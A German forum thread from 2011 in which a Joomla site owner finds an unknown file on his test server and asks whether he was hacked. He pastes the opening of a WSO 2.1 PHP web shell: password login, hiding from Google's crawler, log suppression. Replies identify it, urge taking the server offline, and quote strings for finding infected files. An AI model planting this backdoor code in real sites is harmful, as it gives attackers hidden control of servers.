gehackt oder was ?

**Real_Mann** · 19.01.2011 04:55

Hi
ich habe eine Test Seite in dem ich nur Module etc. teste, und das kennt keiner außer ich, eben grade habe ich was entdeckt die ich nicht hochgeladen habe. Eine inc.php das auch meine Avira als Virus meldet. ich habe das aufgerufen und verlangt nach eine Password.

Dann habe ich das mit eine Editor geöffnet ist ziemlich langes ding. in dem viele Sachen stehen.

Am Anfang steht das hier, vielleicht kann mir jemand helfen. Wurde ich gehackt oder was. ich benutze Joomla 1.5.22

Code:

<?php
/* WSO 2.1 (Web Shell by oRb) */
$auth_pass = "63a95555544kkjjkkjjk9e85481845";
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
	header('HTTP/1.0 404 Not Found');
	exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
	function stripslashes_array($array) {
		return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
	}
	$_POST = stripslashes_array($_POST);
}
function printLogin() {
	?>
	<center>
	<form method=post>
	Password: <input type=password name=pass><input type=submit value='>>'>
	</form></center>
	<?php
	exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
	if( empty( $auth_pass ) ||
		( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
	else
		printLogin();

MFG

**cylance** · 19.01.2011 06:07

Bingo.
Auch schon mal nach "Web Shell by oRb" gegooglet?

http://www.htmlcenter.com/blog/check...s-with-google/
http://www.htmlcenter.com/blog/webshell-hack-an-update/
http://www****dolfmaduro.com/2010/10/...-shell-by-orb/
http://www.davidlprowse.com/forums/s...ead.php?p=7901

Tja, grosse Frage: ist das Dein eigener Server oder ist die Site bei einem Hoster

Mal sehen was Flotte dazu meint

Ich bezweifle im Moment, dass ein Abarbeiten Der Liste zum Erfolg führt.

**Real_Mann** · 19.01.2011 06:40

Zitat von cylance

Bingo.
Auch schon mal nach "Web Shell by oRb" gegooglet?

http://www.htmlcenter.com/blog/check...s-with-google/
http://www.htmlcenter.com/blog/webshell-hack-an-update/

Tja, grosse Frage: ist das Dein eigener Server oder ist die Site bei einem Hoster

Mal sehen was Flotte dazu meint

Ich bezweifle im Moment, dass ein Abarbeiten Der Liste zum Erfolg führt.

Ja, Google habe ich auch schon nach Web Shell by oRb gesucht, Das ist meine eigene Server, Die beiden links habe ich nicht verstanden, gibts die auch auf Deutsch. Welche liste soll ich abarbeiten?

Ich denke eines von dem Modules hat dies Script erstellt, Ich teste sehr viele scripte und Module die ich mal da und da runterlade, das script wurde am 16.01.2011 erstellt, an dem seit wo ich viel getestet hatte.
Auser dem meine test seite kennt doch niemand, und das ist föllig nur zum testen, warum sollten die grade die seite hacken wollen wen ich 100 andere normale seiten habe.

mfg

**cylance** · 19.01.2011 06:46

Also wenn das Dein eigener Server ist, solltest Du ihn erst mal ganz schnell vom Netz nehmen.

Das kann auch sein, dass Die Kiste schon über ein Rootkit ferngesteuert wird. und da reicht ein einfaches Desinfizieren nicht aus.

**Real_Mann** · 19.01.2011 06:54

Zitat von cylance

Also wenn das Dein eigener Server ist, solltest Du ihn erst mal ganz schnell vom Netz nehmen.

Das kann auch sein, dass Die Kiste schon über ein Rootkit ferngesteuert wird. und da reicht ein einfaches Desinfizieren nicht aus.

Kein Panik !!
Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.

mfg

**cylance** · 19.01.2011 07:12

Zitat von Real_Mann

Kein Panik !!
Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.

mfg

Hallo,
hörst Du nicht zu? Ich bezweifle doch stark, dass dieses Script von Dir oder Deinen Modulen ist.
Nimm den Server vom Netz und warte die Antwort unserer Profis hier ab.

**Real_Mann** · 19.01.2011 07:54

So wie ich schon sagte, Kein Panik. ich hatte eine Admin Template getestet. und da war auch das lamer Schwein. als ich den template installiert habe wurde auch eine Upload Scrip mit installiert, das heist irgend wie bekommt jemand bescheid das dieser template installiert wurde und er seine script hochladen und den harten spielen kann, aber bei mir hatte er keine Chance weil weil ROOT nur mit eine API aus meine pc zugänglich ist.

Also das ist mir auch eine leere, nie wieder Module einfach so installieren immer jeden Einzel angucken.

MFG

Rumburack · 19.01.2011 11:22

weil ROOT nur mit eine API aus meine pc zugänglich ist.

Ich lach mich tot über soviel Müll. Wenn da ein shellscript läuft interessiert das garnichts mehr. Manch einer muß erst eine Klage am Hals haben bevor er sein Gehirn etwas bemüht.

**killbill** · 19.01.2011 12:01

Zitat von Real_Mann

Kein Panik !!
Hatte mein beitrag geändert, hastdu die änderung gelesen, Das denke ich nicht das jemand auf mein Server was gemacht hat, ich habe alle möglichen sachen durchsucht, und keine spur, wie schon gesagt das hat beschtimmt eins von dem Module erstellt, und keine hacker erstellt seine scripte direckt auf home verzeichnis.

hi

du solltest wirklich auf die leute hier hören, die einfach mehr erfahrung haben. das ist keine panikmache oder arrogantes getue sondern der tipp, der einfach unumgänglich ist. meine meinung ist an dieser stelle, auch wenn es kein server wäre, also "nur mein persönlicher pc", der nur am netz ist, wenn ich dran sitze, würde ich klar dazu tendieren, die kiste platt zu machen, raten it-foren übrigens oft auch. ich meine, du wirst einfach nie gewissheit haben, ob die kiste sauber ist... und das geht ja nur gut, bis sich ein user was auf deiner seite holt... nein danke.

gruss
killbill

**Kubik-Rubik** · 19.01.2011 13:00

Zitat von Real_Mann

So wie ich schon sagte, Kein Panik.

Wir haben keine Panik, diese solltest du haben!

Wenn du etwas englisch könntest, dann würden dir diese Zeilen die Lockerheit schnell vertreiben:

A few weeks ago, I wrote about the fact that one of my website’s was hacked and exploited by a script apparently known as “WebShell by oRB”. At the time, I was hoping that the issue had been fixed, but I quickly learned that it hadn’t. At least once each day, the hack re-appeared on our website in different ways through different files.

...

I then performed an extremely exhaustive search of our Web server looking for all files that included “WSO”, “eval(base64″ and/or “preg_replace” and dumped that list of files into a log. I then poured over the log file and found about 15 infected files (most of them using preg_replace to somehow insert the malicious code into our site).

Gute Nacht!

Thema: gehackt oder was ?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

gehackt oder was ?

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen